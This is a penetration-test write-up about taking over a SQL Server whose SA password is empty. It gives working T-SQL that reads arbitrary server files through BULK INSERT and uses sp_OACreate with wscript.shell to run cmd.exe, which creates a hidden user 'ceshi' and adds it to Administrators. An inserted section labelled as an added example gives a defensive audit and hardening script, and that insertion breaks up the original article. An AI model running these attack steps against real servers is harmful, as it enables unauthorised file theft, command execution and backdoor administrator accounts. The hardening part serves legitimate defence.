A friend called me a few days ago and asked me to help test their servers. After scanning, I found that the SQL Server SA password was empty and decided to use this for the penetration test. On closer inspection, the stored procedure xp_cmdshell and the registry-reading stored procedures had been deleted, and xplog70.dll had been removed as well. So there was no way to execute CMD commands or clone the administrator account; the server looked like it had been hardened. With what I knew at the time, there was no way in. I had run into similar machines before, so I decided to spend a few days on the problem.
After two days of reading and testing, I found that you can obtain the contents of txt, asp, and other files from the target machine without using any of those stored procedures, provided you know the SA password (or the SA password is empty). The idea is to create a temporary table, read the file into the table, and then use a SELECT to return the rows, which are the contents of the file. We can paste a stored procedure into the query analyzer and execute it once; afterwards you only need to call the procedure as needed:
Create proc sp_readTextFile @filename sysname
As
Begin
Set nocount on
-- one row per line of the file; 8000 is the varchar limit in SQL Server 2000
Create table #tempfile (line varchar(8000))
-- the file name must be quoted inside the dynamic statement, so the single quotes are doubled
Exec ('bulk insert #tempfile from ''' + @filename + '''')
Select * from #tempfile
Drop table #tempfile
End
Go
In this way, you only need to execute a statement like the following to get the contents of the file at the specified path:
Exec sp_readTextFile 'C:\aaa.asp'
After implementing this, I planned to read the asp code of the website on my friend's server to push the intrusion further, but it turned out that I did not know the absolute path of the asp files on the site, so the procedure could not be used at all and I had to set it aside and look for another method. Over the next few days I remembered the series of OLE-related stored procedures that security articles often mention. These stored procedures are just as dangerous as xp_cmdshell and the registry-reading stored procedures, yet they are far less often discussed online than the book suggests. The procedures in this series are sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty and sp_OAStop. Here is how they are used:
Open the query analyzer, connect to the target machine as SA, and execute the following in the query analyzer:
DECLARE @shell int
EXEC sp_OACreate 'wscript.shell', @shell OUTPUT
EXEC sp_OAMethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net user ceshi 1 /add' --
In this way, a user with the username ceshi and password 1 is added to the remote system. Then execute:
DECLARE @shell int
EXEC sp_OACreate 'wscript.shell', @shell OUTPUT
EXEC sp_OAMethod @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net localgroup Administrators ceshi /add' --
Now ceshi is a member of the Administrators group.
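The defensive counterpart to the two techniques above, as an added example that is not part of the original write-up: a T-SQL audit-and-harden script for SQL Server 2005 and later (the article's target ran the older Query Analyzer, where the OLE automation procedures could only be removed by hand). It lists logins with a blank password, shows whether the OLE Automation procedures and xp_cmdshell are switched on, turns both off, disables the sa login, and shows the permission that gates BULK INSERT. The login name app_login is a placeholder, not from the article.

```sql
-- Added example, not code from the original article. Run as a sysadmin.

-- 1. Logins whose password is empty: the condition the whole intrusion relied on.
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 2. Current state of the two features that turn SQL Server into a command shell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures', 'xp_cmdshell');

-- 3. Switch them off. Both are advanced options, so 'show advanced options'
--    must be on while they are changed; it is turned back off afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Disable sa outright so a blank or guessed password no longer gives a login.
--    Use a dedicated named sysadmin login instead.
ALTER LOGIN sa DISABLE;

-- 5. BULK INSERT (the file-reading trick) needs the server-level
--    ADMINISTER BULK OPERATIONS permission (or the bulkadmin role).
--    Application logins should not hold it; app_login is a placeholder name.
-- DENY ADMINISTER BULK OPERATIONS TO [app_login];
```

Step 2 is the one worth scheduling: the article shows that an attacker who reaches sysadmin can re-enable these options with the same sp_configure calls, so a periodic check that they are still 0 (and an alert when they change) is a cheap detection for exactly this kind of intrusion.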
Conclusion: through this penetration test, we learned a way to take control of a SQL Server with an empty SA password using only its built-in stored procedures.